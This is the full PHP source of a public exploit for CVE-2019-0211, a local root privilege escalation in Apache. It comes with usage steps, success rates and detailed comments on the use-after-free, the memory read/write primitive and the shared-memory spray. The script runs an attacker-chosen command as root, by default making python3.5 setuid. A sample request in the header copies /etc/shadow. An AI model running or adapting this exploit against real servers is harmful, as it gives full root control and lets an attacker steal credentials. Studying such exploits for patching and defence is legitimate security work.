CVE-2019-0211-apache

<?php
# CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
# Charles Fol
# @cfreal_
# 2019-04-08
#
# INFOS
#
# https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
#
# USAGE
#
# 1. Upload exploit to Apache HTTP server
# 2. Send request to page
# 3. Await 6:25AM for logrotate to restart Apache
# 4. python3.5 is now suid 0
#
# You can change the command that is ran as root using the cmd HTTP
# parameter (GET/POST).
# Example: curl http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/
#
# SUCCESS RATE
#
# Number of successful and failed exploitations relative to of the number
# of MPM workers (i.e. Apache subprocesses). YMMV.
#
# W  --% S   F
#  5 87% 177 26 (default)
#  8 89%  60  8
# 10 95%  70  4
#
# More workers, higher success rate.
# By default (5 workers), 87% success rate. With huge HTTPds, close to 100%.
# Generally, failure is due to all_buckets being relocated too far from its
# original address.
#
# TESTED ON
#
# - Apache/2.4.25
# - PHP 7.2.12
# - Debian GNU/Linux 9.6
#
# TESTING
#
# $ curl http://localhost/cfreal-carpediem.php
# $ sudo /usr/sbin/logrotate /etc/logrotate.conf --force
# $ ls -alh /usr/bin/python3.5
# -rwsr-sr-x 2 root root 4.6M Sep 27  2018 /usr/bin/python3.5
#
# There are no hardcoded addresses.
# - Addresses read through /proc/self/mem
# - Offsets read through ELF parsing
#
# As usual, there are tons of comments.
#


o('CARPE (DIEM) ~ CVE-2019-0211');
o('');

error_reporting(E_ALL);


# Starts the exploit by triggering the UAF.
function real()
{
    global $y;
    $y = [new Z()];
    json_encode([0 => &$y]);
}

# In order to read/write what comes after in memory, we need to UAF a string so
# that we can control its size and make in-place edition.
# An easy way to do that is to replace the string by a timelib_rel_time
# structure of which the first bytes can be reached by the (y, m, d, h, i, s)
# properties of the DateInterval object.
#
# Steps:
# - Create a base object (Z)
# - Add string property (abc) so that sizeof(abc) = sizeof(timelib_rel_time)
# - Create DateInterval object ($place) meant to be unset and filled by another
# - Trigger the UAF by unsetting $y[0], which is still reachable using $this
# - Unset $place: at this point, if we create a new DateInterval object, it will
#   replace $place in memory
# - Create a string ($holder) that fills $place's timelib_rel_time structure
# - Allocate a new DateInterval object: its timelib_rel_time structure will
#   end up in place of abc
# - Now we can control $this->abc's zend_string structure entirely using
#   y, m, d etc.
# - Increase abc's size so that we can read/write memory that comes after it,
#   especially the shared memory block
# - Find out all_buckets' position by finding a memory region that matches the
#   mutex->meth structure
# - Compute the bucket index required to reach the SHM and get an arbitrary
#   function call
# - Scan ap_scoreboard_image->parent[] to find workers' PID and replace the
#   bucket
class Z implements JsonSerializable
{
    public function jsonSerialize()
    {
        global $y, $addresses, $workers_pids;

        #
        # Setup memory
        #
        o('Triggering UAF');
        o('  Creating room and filling empty spaces');

        # Fill empty blocks to make sure our allocations will be contiguous
        # I: Since a lot of allocations/deallocations happen before the script
        # is ran, two variables instanciated at the same time might not be
        # contiguous: this can be a problem for a lot of reasons.
        # To avoid this, we instanciate several DateInterval objects. These
        # objects will fill a lot of potentially non-contiguous memory blocks,
        # ensuring we get "fresh memory" in upcoming allocations.
        $contiguous = [];
        for($i=0;$i<10;$i++)
            $contiguous[] = new DateInterval('PT1S');

        # Create some space for our UAF blocks not to get overwritten
        # I: A PHP object is a combination of a lot of structures, such as
        # zval, zend_object, zend_object_handlers, zend_string, etc., which are
        # all allocated, and freed when the object is destroyed.
        # After the UAF is triggered on the object, all the structures that are
        # used to represent it will be marked as free.
        # If we create other variables afterwards, those variables might be
        # allocated in the object's previous memory regions, which might pose
        # problems for the rest of the exploitation.
        # To avoid this, we allocate a lot of objects before the UAF, and free
        # them afterwards. Since PHP's heap is LIFO, when we create other vars,
        # they will take the place of those objects instead of the object we
        # are triggering the UAF on. This means our object is "shielded" and
        # we don't have to worry about breaking it.
        $room = [];
        for($i=0;$i<10;$i++)
            $room[] = new Z();

        # Build string meant to fill old DateInterval's timelib_rel_time
        # I: ptr2str's name is unintuitive here: we just want to allocate a
        # zend_string of size 78.
        $_protector = ptr2str(0, 78);

        o('  Allocating $abc and $p');

        # Create ABC
        # I: This is the variable we will use to R/W memory afterwards.
        # After we free the Z object, we'll make sure abc is overwritten by a
        # timelib_rel_time structure under our control. The first 8*8 = 64 bytes
        # of this structure can be modified easily, meaning we can change the
        # size of abc. This will allow us to read/write memory after abc.
        $this->abc = ptr2str(0, 79);

        # Create $p meant to protect $this's blocks
        # I: Right after we trigger the UAF, we will unset $p.
        # This means that the timelib_rel_time structure (TRT) of this object
        # will be freed. We will then allocate a string ($protector) of the same
        # size as TRT. Since PHP's heap is LIFO, the string will take the place
        # of the now-freed TRT in memory.
        # Then, we create a new DateInterval object ($x). From the same
        # assumption, every structure constituting this new object will take the
        # place of the previous structure. Nevertheless, since TRT's memory
        # block has already been replaced by $protector, the new TRT will be put
        # in the next free blocks of the same size, which happens to be $abc
        # (remember, |abc| == |timelib_rel_time|).
        # We now have the following situation: $x is a DateInterval object whose
        # internal TRT structure has the same address as $abc's zend_string.
        $p = new DateInterval('PT1S');

        #
        # Trigger UAF
        #

        o('  Unsetting both variables and setting $protector');
        # UAF here, $this is usable despite being freed
        unset($y[0]);
        # Protect $this's freed blocks
        unset($p);

        # Protect $p's timelib_rel_time structure
        $protector = ".$_protector";
        # !!! This is only required for apache
        # Got no idea as to why there is an extra deallocation (?)
        if(version_compare(PHP_VERSION, '7.2') >= 0)
                    $room[] = "!$_protector";

        o('  Creating DateInterval object');
        # After this line:
        # &((php_interval_obj) x).timelib_rel_time == ((zval) abc).value.str
        # We can control the structure of $this->abc and therefore read/write
        # anything that comes after it in memory by changing its size and
        # making in-place edits using $this->abc[$position] = $char
        $x = new DateInterval('PT1S');
        # zend_string.refcount = 0
        # It will get incremented at some point, and if it is > 1,
        # zend_assign_to_string_offset() will try to duplicate it before making
        # the in-place replacement
        $x->y = 0x00;
        # zend_string.len
        $x->d = 0x100;
        # zend_string.val[0-4]
        $x->h = 0x13121110;

        # Verify UAF was successful
        # We modified stuff via $x; they should be visible by $this->abc, since
        # they are at the same memory location.
        if(!(
            strlen($this->abc) === $x->d &&
            $this->abc[0] == "\x10" &&
            $this->abc[1] == "\x11" &&
            $this->abc[2] == "\x12" &&
            $this->abc[3] == "\x13"
        ))
        {
            o('UAF failed, exiting.');
            exit();
        }
        o('UAF successful.');
        o('');

        # Give us some room
        # I: As indicated before, just unset a lot of stuff so that next allocs
        # don't break our fragile UAFd structure.
        unset($room);

        #
        # Setup the R/W primitive
        #

        # We control $abc's internal zend_string structure, therefore we can R/W
        # the shared memory block (SHM), but for that we need to know the
        # position of $abc in memory
        # I: We know the absolute position of the SHM, so we need to need abc's
        # as well, otherwise we cannot compute the offset

        # Assuming the allocation was contiguous, memory looks like this, with
        # 0x70-sized fastbins:
        #   [zend_string:abc]
        #   [zend_string:protector]
        #   [FREE#1]
        #   [FREE#2]
        # Therefore, the address of the 2nd free block is in the first 8 bytes
        # of the first block: 0x70 * 2 - 24
        $address = str2ptr($this->abc, 0x70 * 2 - 24);
        # The address we got points to FREE#2, hence we're |block| * 3 higher in
        # memory
        $address = $address - 0x70 * 3;
        # The beginning of the string is 24 bytes after its origin
        $address = $address + 24;
        o('Address of $abc: 0x' . dechex($address));
        o('');

        # Compute the size required for our string to include the whole SHM and
        # apache's memory region
        $distance =
            max($addresses['apache'][1], $addresses['shm'][1]) -
            $address
        ;
        $x->d = $distance;

        # We can now read/write in the whole SHM and apache's memory region.

        #
        # Find all_buckets in memory
        #

        # We are looking for a structure s.t.
        # |all_buckets, mutex| = 0x10
        # |mutex, meth| = 0x8
        # all_buckets is in apache's memory region
        # mutex is in apache's memory region
        # meth is in libaprR's memory region
        # meth's function pointers are in libaprX's memory region
        o('Looking for all_buckets in memory');
        $all_buckets = 0;

        for(
            $i = $addresses['apache'][0] + 0x10;
            $i < $addresses['apache'][1] - 0x08;
            $i += 8
        )
        {
            # mutex
            $mutex = $pointer = str2ptr($this->abc, $i - $address);
            if(!in($pointer, $addresses['apache']))
                continue;


            # meth
            $meth = $pointer = str2ptr($this->abc, $pointer + 0x8 - $address);
            if(!in($pointer, $addresses['libaprR']))
                continue;

            o('  [&mutex]: 0x' . dechex($i));
            o('    [mutex]: 0x' . dechex($mutex));
            o('      [meth]: 0x' . dechex($meth));


            # meth->*
            # flags
            if(str2ptr($this->abc, $pointer - $address) != 0)
                continue;
            # methods
            for($j=0;$j<7;$j++)
            {
                $m = str2ptr($this->abc, $pointer + 0x8 + $j * 8 - $address);
                if(!in($m, $addresses['libaprX']))
                    continue 2;
                o('        [*]: 0x' . dechex($m));
            }

            $all_buckets = $i - 0x10;
            o('all_buckets = 0x' . dechex($all_buckets));
            break;
        }

        if(!$all_buckets)
        {
            o('Unable to find all_buckets');
            exit();
        }

        o('');

        # The address of all_buckets will change when apache is gracefully
        # restarted. This is a problem because we need to know all_buckets's
        # address in order to make all_buckets[some_index] point to a memory
        # region we control.

        #
        # Compute potential bucket indexes and their addresses
        #

        o('Computing potential bucket indexes and addresses');

        # Since we have sizeof($workers_pid) MPM workers, we can fill the rest
        # of the ap_score_image->servers items, so 256 - sizeof($workers_pids),
        # with data we like. We keep the one at the top to store our payload.
        # The rest is sprayed with the address of our payload.

        $size_prefork_child_bucket = 24;
        $size_worker_score = 264;
        # I get strange errors if I use every "free" item, so I leave twice as
        # many items free. I'm guessing upon startup some
        $spray_size = $size_worker_score * (256 - sizeof($workers_pids) * 2);
        $spray_max = $addresses['shm'][1];
        $spray_min = $spray_max - $spray_size;

        $spray_middle = (int) (($spray_min + $spray_max) / 2);
        $bucket_index_middle = (int) (
            - ($all_buckets - $spray_middle) /
            $size_prefork_child_bucket
        );

        #
        # Build payload
        #

        # A worker_score structure was kept empty to put our payload in
        $payload_start = $spray_min - $size_worker_score;

        $z = ptr2str(0);

        # Payload maxsize 264 - 112 = 152
        # Offset 8 cannot be 0, but other than this you can type whatever
        # command you want
        $bucket = isset($_REQUEST['cmd']) ?
            $_REQUEST['cmd'] :
            "chmod +s /usr/bin/python3.5";

        if(strlen($bucket) > $size_worker_score - 112)
        {
            o(
                'Payload size is bigger than available space (' .
                ($size_worker_score - 112) .
                '), exiting.'
            );
            exit();
        }
        # Align
        $bucket = str_pad($bucket, $size_worker_score - 112, "\x00");

        # apr_proc_mutex_unix_lock_methods_t
        $meth =
            $z .
            $z .
            $z .
            $z .
            $z .
            $z .
            # child_init
            ptr2str($addresses['zend_object_std_dtor'])
        ;

        # The second pointer points to meth, and is used before reaching the
        # arbitrary function call
        # The third one and the last one are both used by the function call
        # zend_object_std_dtor(object) => ... => system(&arData[0]->val)
        $properties =
            # refcount
            ptr2str(1) .
            # u-nTableMask meth
            ptr2str($payload_start + strlen($bucket)) .
            # Bucket arData
            ptr2str($payload_start) .
            # uint32_t nNumUsed;
            ptr2str(1, 4) .
            # uint32_t nNumOfElements;
            ptr2str(0, 4) .
            # uint32_t nTableSize
            ptr2str(0, 4) .
            # uint32_t nInternalPointer
            ptr2str(0, 4) .
            # zend_long nNextFreeElement
            $z .
            # dtor_func_t pDestructor
            ptr2str($addresses['system'])
        ;

        $payload =
            $bucket .
            $meth .
            $properties
        ;

        # Write the payload

        o('Placing payload at address 0x' . dechex($payload_start));

        $p = $payload_start - $address;
        for(
            $i = 0;
            $i < strlen($payload);
            $i++
        )
        {
            $this->abc[$p+$i] = $payload[$i];
        }

        # Fill the spray area with a pointer to properties

        $properties_address = $payload_start + strlen($bucket) + strlen($meth);
        o('Spraying pointer');
        o('  Address: 0x' . dechex($properties_address));
        o('  From: 0x' . dechex($spray_min));
        o('  To: 0x' . dechex($spray_max));
        o('  Size: 0x' . dechex($spray_size));
        o('  Covered: 0x' . dechex($spray_size * count($workers_pids)));
        o('  Apache: 0x' . dechex(
            $addresses['apache'][1] -
            $addresses['apache'][0]
        ));

        $s_properties_address = ptr2str($properties_address);

        for(
            $i = $spray_min;
            $i < $spray_max;
            $i++
        )
        {
            $this->abc[$i - $address] = $s_properties_address[$i % 8];
        }
        o('');

        # Find workers PID in the SHM: it indicates the beginning of their
        # process_score structure. We can then change process_score.bucket to
        # the index we computed. When apache reboots, it will use
        # all_buckets[ap_scoreboard_image->parent[i]->bucket]->mutex
        # which means we control the whole apr_proc_mutex_t structure.
        # This structure contains pointers to multiple functions, especially
        # mutex->meth->child_init(), which will be called before privileges
        # are dropped.
        # We do this for every worker PID, incrementing the bucket index so that
        # we cover a bigger range.

        o('Iterating in SHM to find PIDs...');

        # Number of bucket indexes covered by our spray
        $spray_nb_buckets = (int) ($spray_size / $size_prefork_child_bucket);
        # Number of bucket indexes covered by our spray and the PS structures
        $total_nb_buckets = $spray_nb_buckets * count($workers_pids);
        # First bucket index to handle
        $bucket_index = $bucket_index_middle - (int) ($total_nb_buckets / 2);

        # Iterate over every process_score structure until we find every PID or
        # we reach the end of the SHM
        for(
            $p = $addresses['shm'][0] + 0x20;
            $p < $addresses['shm'][1] && count($workers_pids) > 0;
            $p += 0x24
        )
        {
            $l = $p - $address;
            $current_pid = str2ptr($this->abc, $l, 4);
            o('Got PID: ' . $current_pid);
            # The PID matches one of the workers
            if(in_array($current_pid, $workers_pids))
            {
                unset($workers_pids[$current_pid]);
                o('  PID matches');
                # Update bucket address
                $s_bucket_index = pack('l', $bucket_index);
                $this->abc[$l + 0x20] = $s_bucket_index[0];
                $this->abc[$l + 0x21] = $s_bucket_index[1];
                $this->abc[$l + 0x22] = $s_bucket_index[2];
                $this->abc[$l + 0x23] = $s_bucket_index[3];
                o('  Changed bucket value to ' . $bucket_index);
                $min = $spray_min - $size_prefork_child_bucket * $bucket_index;
                $max = $spray_max - $size_prefork_child_bucket * $bucket_index;
                o('  Ranges: 0x' . dechex($min) . ' - 0x' . dechex($max));
                # This bucket range is covered, go to the next one
                $bucket_index += $spray_nb_buckets;
            }
        }

        if(count($workers_pids) > 0)
        {
            o(
                'Unable to find PIDs ' .
                implode(', ', $workers_pids) .
                ' in SHM, exiting.'
            );
            exit();
        }

        o('');
        o('EXPLOIT SUCCESSFUL.');
        o('Await 6:25AM.');

        return 0;
    }
}

function o($msg)
{
    # No concatenation -> no string allocation
    print($msg);
    print("\n");
}

function ptr2str($ptr, $m=8)
{
    $out = "";
    for ($i=0; $i<$m; $i++)
    {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

function str2ptr(&$str, $p, $s=8)
{
    $address = 0;
    for($j=$s-1;$j>=0;$j--)
    {
        $address <<= 8;
        $address |= ord($str[$p+$j]);
    }
    return $address;
}

function in($i, $range)
{
    return $i >= $range[0] && $i < $range[1];
}

/**
 * Finds the offset of a symbol in a file.
 */
function find_symbol($file, $symbol)
{
    $elf = file_get_contents($file);
    $e_shoff = str2ptr($elf, 0x28);
    $e_shentsize = str2ptr($elf, 0x3a, 2);
    $e_shnum = str2ptr($elf, 0x3c, 2);

    $dynsym_off = 0;
    $dynsym_sz = 0;
    $dynstr_off = 0;

    for($i=0;$i<$e_shnum;$i++)
    {
        $offset = $e_shoff + $i * $e_shentsize;
        $sh_type = str2ptr($elf, $offset + 0x04, 4);

        $SHT_DYNSYM = 11;
        $SHT_SYMTAB = 2;
        $SHT_STRTAB = 3;

        switch($sh_type)
        {
            case $SHT_DYNSYM:
                $dynsym_off = str2ptr($elf, $offset + 0x18, 8);
                $dynsym_sz = str2ptr($elf, $offset + 0x20, 8);
                break;
            case $SHT_STRTAB:
            case $SHT_SYMTAB:
                if(!$dynstr_off)
                    $dynstr_off = str2ptr($elf, $offset + 0x18, 8);
                break;
        }

    }

    if(!($dynsym_off && $dynsym_sz && $dynstr_off))
        exit('.');

    $sizeof_Elf64_Sym = 0x18;

    for($i=0;$i * $sizeof_Elf64_Sym < $dynsym_sz;$i++)
    {
        $offset = $dynsym_off + $i * $sizeof_Elf64_Sym;
        $st_name = str2ptr($elf, $offset, 4);

        if(!$st_name)
            continue;

        $offset_string = $dynstr_off + $st_name;
        $end = strpos($elf, "\x00", $offset_string) - $offset_string;
        $string = substr($elf, $offset_string, $end);

        if($string == $symbol)
        {
            $st_value = str2ptr($elf, $offset + 0x8, 8);
            return $st_value;
        }
    }

    die('Unable to find symbol ' . $symbol);
}

# Obtains the addresses of the shared memory block and some functions through
# /proc/self/maps
# This is hacky as hell.
function get_all_addresses()
{
    $addresses = [];
    $data = file_get_contents('/proc/self/maps');
    $follows_shm = false;

    foreach(explode("\n", $data) as $line)
    {
        if(!isset($addresses['shm']) && strpos($line, '/dev/zero'))
        {
            $line = explode(' ', $line)[0];
            $bounds = array_map('hexdec', explode('-', $line));
        $msize = $bounds[1] - $bounds[0];
            if ($msize >= 0x10000 && $msize <= 0x16000)
            {
                $addresses['shm'] = $bounds;
                $follows_shm = true;
            }
        }
        if(
            preg_match('#(/[^\s]+libc-[0-9.]+.so[^\s]*)#', $line, $matches) &&
            strpos($line, 'r-xp')
        )
        {
            $offset = find_symbol($matches[1], 'system');
            $line = explode(' ', $line)[0];
            $line = hexdec(explode('-', $line)[0]);
            $addresses['system'] = $line + $offset;
        }
        if(
            strpos($line, 'libapr-1.so') &&
            strpos($line, 'r-xp')
        )
        {
            $line = explode(' ', $line)[0];
            $bounds = array_map('hexdec', explode('-', $line));
            $addresses['libaprX'] = $bounds;
        }
        if(
            strpos($line, 'libapr-1.so') &&
            strpos($line, 'r--p')
        )
        {
            $line = explode(' ', $line)[0];
            $bounds = array_map('hexdec', explode('-', $line));
            $addresses['libaprR'] = $bounds;
        }
        # Apache's memory block is between the SHM and ld.so
        # Sometimes some rwx region gets mapped; all_buckets cannot be in there
        # but we include it anyways for the sake of simplicity
        if(
            (
                strpos($line, 'rw-p') ||
                strpos($line, 'rwxp')
            ) &&
            $follows_shm
        )
        {
            if(strpos($line, '/lib'))
            {
                $follows_shm = false;
                continue;
            }
            $line = explode(' ', $line)[0];
            $bounds = array_map('hexdec', explode('-', $line));
            if(!array_key_exists('apache', $addresses))
                $addresses['apache'] = $bounds;
            else if($addresses['apache'][1] == $bounds[0])
                $addresses['apache'][1] = $bounds[1];
            else
                $follows_shm = false;
        }
        if(
            preg_match('#(/[^\s]+libphp7[0-9.]+.so[^\s]*)#', $line, $matches) &&
            strpos($line, 'r-xp')
        )
        {
            $offset = find_symbol($matches[1], 'zend_object_std_dtor');
            $line = explode(' ', $line)[0];
            $line = hexdec(explode('-', $line)[0]);
            $addresses['zend_object_std_dtor'] = $line + $offset;
        }
    }

    $expected = [
        'shm', 'system', 'libaprR', 'libaprX', 'apache', 'zend_object_std_dtor'
    ];
    $missing = array_diff($expected, array_keys($addresses));

    if($missing)
    {
        o(
            'The following addresses were not determined by parsing ' .
            '/proc/self/maps: ' . implode(', ', $missing)
        );
        exit(0);
    }


    o('PID: ' . getmypid());
    o('Fetching addresses');

    foreach($addresses as $k => $a)
    {
        if(!is_array($a))
            $a = [$a];
        o('  ' . $k . ': ' . implode('-0x', array_map(function($z) {
                return '0x' . dechex($z);
        }, $a)));
    }
    o('');

    return $addresses;
}

# Extracts PIDs of apache workers using /proc/*/cmdline and /proc/*/status,
# matching the cmdline and the UID
function get_workers_pids()
{
    o('Obtaining apache workers PIDs');
    $pids = [];
    $cmd = file_get_contents('/proc/self/cmdline');
    $processes = glob('/proc/*');
    foreach($processes as $process)
    {
        if(!preg_match('#^/proc/([0-9]+)$#', $process, $match))
            continue;
        $pid = (int) $match[1];
        if(
            !is_readable($process . '/cmdline') ||
            !is_readable($process . '/status')
        )
            continue;
        if($cmd !== file_get_contents($process . '/cmdline'))
            continue;

        $status = file_get_contents($process . '/status');
        foreach(explode("\n", $status) as $line)
        {
            if(
                strpos($line, 'Uid:') === 0 &&
                preg_match('#\b' . posix_getuid() . '\b#', $line)
            )
            {
                o('  Found apache worker: ' . $pid);
                $pids[$pid] = $pid;
                break;
            }

        }
    }

    o('Got ' . sizeof($pids) . ' PIDs.');
    o('');

    return $pids;
}

$addresses = get_all_addresses();
$workers_pids = get_workers_pids();
real();